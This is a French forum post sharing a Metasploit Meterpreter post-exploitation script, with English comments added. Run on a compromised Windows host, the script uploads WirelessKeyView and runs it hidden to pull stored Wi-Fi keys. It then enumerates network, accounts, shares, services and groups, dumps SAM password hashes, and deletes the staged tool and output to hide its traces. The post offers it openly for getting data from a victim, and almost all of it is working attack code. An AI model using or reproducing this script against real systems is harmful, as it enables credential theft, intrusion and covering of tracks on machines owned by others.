
meterpreter, upload + destruction exe


  • meterpreter, upload + destruction exe

    flowpa.rb permet l'upload et la destruction de l'exe une fois que celui-ci nous a refilé ce que l'on voulait.

    Code:
    #
    # This is a Meterpreter script designed to be used by the Metasploit Framework
    #
    # The goal of this script is to obtain system information from a victim through
    # an existing Meterpreter session. This is only a simple example of what can
    # be accomplished through Meterpreter scripting.
    #
    # hdm[at]metasploit.com
    #
    
    # Some of this script was developed in conjunction with _MAX_ (max[at]remote-exploit.org)
    # The complete version will be released in the future as 'autometer'
    
    # Remove a file on the session host by spawning `del` through cmd.exe,
    # polling until the spawned process no longer reports a name, then
    # releasing the process handle. Meterpreter had no unlink API when this
    # was written. Note: only the commented-out registry export below calls it.
    #
    # @param session [Object] the Meterpreter session (responds to sys.process.execute)
    # @param path [String] path appended verbatim to the del command line
    # @return [Object] whatever the process handle's close returns
    def m_unlink(session, path)
        command = "cmd.exe /c del /F /S /Q " + path
        proc_handle = session.sys.process.execute(command, nil, { 'Hidden' => 'true' })
        # Sleep 100ms per poll; select with no IO sets is just a timed wait.
        select(nil, nil, nil, 0.10) while proc_handle.name
        proc_handle.close
    end
    
    # Run a command on the session host as a hidden, channelized process,
    # drain the process's output channel until read returns nil/false,
    # release the channel and then the process handle, and return the
    # collected output.
    #
    # @param session [Object] the Meterpreter session (responds to sys.process.execute)
    # @param cmd [String] command line passed straight through to process.execute
    # @return [String] everything read from the channel, concatenated in order
    def m_exec(session, cmd)
        proc_handle = session.sys.process.execute(cmd, nil, { 'Hidden' => true, 'Channelized' => true })
        output = "".dup
        # A nil (or false) read marks the end of the channel's stream.
        loop do
            chunk = proc_handle.channel.read
            break unless chunk
            output << chunk
        end
        proc_handle.channel.close
        proc_handle.close
        output
    end
    
    
    # `client` is supplied by the Meterpreter script runner and holds the live
    # session; it is aliased to `session` so the helpers above (which take a
    # session parameter) and plugin-style code share one name.
    session = client
    
    # tunnel_peer is the session transport's peer as "host:port"; assigning to two
    # receivers keeps the first two fields of split(':'). Assumes a dotted IPv4
    # textual form -- a bracketed IPv6 peer would not split this way (not verified here).
    host,port = session.tunnel_peer.split(':')
    
    print_status("Nouvelle session > #{host}:#{port}...")
    
    # Stages a third-party binary on the session host and starts it through
    # cmd.exe. Per the stdapi File API the argument order is (destination on the
    # session host, local source), so "/tmp/WirelessKeyView.exe" is the
    # operator-side file. Whether upload_file expands %WinDir% itself is not
    # shown here; cmd.exe does expand it on the execute line. Host-side
    # artifacts this leaves behind: a new executable under %WinDir%, a cmd.exe
    # child of the session process, and %WinDir%\wire.txt -- exactly what a
    # file-integrity or process-creation log would record.
    print_status("Upload de Wireless Key Viewer...")
    session.fs.file.upload_file("%WinDir%\\WirelessKeyView.exe", "/tmp/WirelessKeyView.exe")
    print_status("Execution de Wireless Key Viewer...")
    # 'Hidden' is the String 'true' here and the boolean true in the cleanup
    # calls at the end; both are truthy in Ruby so behaviour does not differ,
    # but the inconsistency is worth normalising.
    session.sys.process.execute("cmd.exe /c wkv /stext %WinDir%/wire.txt", nil, {'Hidden' => 'true'})
    # Fixed two-second wait; nothing checks that the process finished or that
    # wire.txt exists before it is read further down.
    sleep(2)
    
    # Operator-side log directory: <tmpdir>/atxwpalogs/<host>_<YYYYMMDD.MMSS><rrr>.
    # The strftime format has no hour field (%M is minutes), so two runs against
    # the same host in different hours can share the timestamp part; the
    # three-digit rand(100) suffix is the only disambiguator.
    logs = File.join(::Dir.tmpdir, 'atxwpalogs', host + "_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.3d",rand(100)) )
    
    # Create the log directory (FileUtils is presumably loaded by the framework;
    # no require is visible in this listing).
    FileUtils.mkdir_p(logs)
    
    
    begin
    
        # Only referenced by the commented-out registry export below, so this
        # value is unused on the active path.
        tmp = session.fs.file.expand_path("%TEMP%")
    
        print_status("Collecte des informations system...")
    
        # network.txt: routing table from the session's net extension, then the
        # raw output of two netstat invocations. Each m_exec call spawns a
        # hidden, channelized process on the session host.
        File.open(File.join(logs, "network.txt"), "w") do |fd|
            fd.puts("=" * 70)
            session.net.config.each_route do |route|
                fd.puts("Local subnet: #{route.subnet}/#{route.netmask}")
            end
    
            fd.puts("=" * 70)
            fd.puts(m_exec(session, "netstat -na"))
    
            fd.puts("=" * 70)
            fd.puts(m_exec(session, "netstat -ns"))
        end
    
        # system.txt: only the 'Computer' and 'OS' keys of sysinfo are recorded.
        info = session.sys.config.sysinfo()
        File.open(File.join(logs, "system.txt"), "w") do |fd|
            fd.puts("Computer: #{info['Computer']}")
            fd.puts("OS: #{info['OS']}")
        end
    
        # env.txt: the full environment of the spawned cmd.exe, which may itself
        # carry secrets -- the operator-side log directory should be treated as
        # sensitive data, not scratch output.
        File.open(File.join(logs, "env.txt"), "w") do |fd|
            fd.puts(m_exec(session, "cmd.exe /c set"))
        end
    
        # wireless.txt: contents of the file written by the tool started above.
        # The path separator differs from the execute call ("/" there, "\" here);
        # cmd.exe accepts both.
        File.open(File.join(logs, "wireless.txt"), "w") do |fd|
            fd.puts(m_exec(session, "cmd.exe /c type %WinDir%\\wire.txt"))
    
        end
    
        # Account, share, service, neighbourhood and group enumeration via
        # net.exe. Each call is a separate process on the session host; no exit
        # status is checked, so an error message simply lands in the file.
        File.open(File.join(logs, "users.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net user"))
        end
    
        File.open(File.join(logs, "shares.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net share"))
        end
    
        File.open(File.join(logs, "services.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net start"))
        end
    
        File.open(File.join(logs, "nethood.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net view"))
        end
    
        File.open(File.join(logs, "localgroup.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net localgroup"))
        end
    
        File.open(File.join(logs, "group.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net group"))
        end
    
        # Loads the priv extension and reads SAM hashes through it; the actual
        # mechanism lives inside the extension, not in this script. On the host
        # side this is the credential-access step that endpoint telemetry is
        # most likely to flag. Failures are logged and the script continues.
        begin
            session.core.use("priv")
            hashes = session.priv.sam_hashes
            print_status("Recuperation des hashes windows...")
            File.open(File.join(logs, "hashes.txt"), "w") do |fd|
                hashes.each do |user|
                    fd.puts(user.to_s)
                end
            end
        # ::Exception also swallows Interrupt and SystemExit; rescuing
        # StandardError (a bare rescue) would be the conventional choice.
        rescue ::Exception => e
            print_status("Erreur dumping hashes: #{e.class} #{e}")
        end
    
    # Registry export left disabled by the author; it is the only caller of
    # m_unlink and the only user of `tmp`.
    #    print_status("Obtaining the entire registry...")
    #    hives = %w{HKCU HKLM HKCC HKCR HKU}
    #    hives.each do |hive|
    #        print_status(" Exporting #{hive}")
    #
    #        tempname = "#{tmp}\\#{Rex::Text.rand_text_alpha(8)}.reg"
    #        m_exec(session, "reg.exe export #{hive} #{tempname}")
    #
    #        print_status(" Downloading #{hive} (#{tempname})")
    #        session.fs.file.download_file(File.join(logs, "#{hive}.reg"), tempname)
    
    #        print_status(" Cleaning #{hive}")
    #        m_unlink(session, tempname)
    #    end
        
        # Best-effort removal of the two files staged earlier. Unlike m_unlink,
        # these calls neither wait for del to finish nor close the returned
        # process handle, and the m_unlink helper itself is never used on the
        # active path. 'Hidden' is the boolean true here (String 'true' above).
        print_status("Suppression de Wireless Key Viewer...")
        session.sys.process.execute("cmd.exe /c del %WinDir%\\wire.txt", nil, {'Hidden' => true})
        session.sys.process.execute("cmd.exe /c del %WinDir%\\WirelessKeyView.exe", nil, {'Hidden' => true})
    
        print_status("Recuperation des donnees terminee sur #{host}:#{port}...")
        
    # Catch-all for the whole collection phase; as with the inner rescue,
    # ::Exception is broader than StandardError. Any exception raised before
    # the cleanup lines leaves the staged files on the session host, which is
    # also why those artifacts are a useful forensic indicator.
    rescue ::Exception => e
        print_status("Exception: #{e.class} #{e} #{e.backtrace}")
    end
    dédicace : koala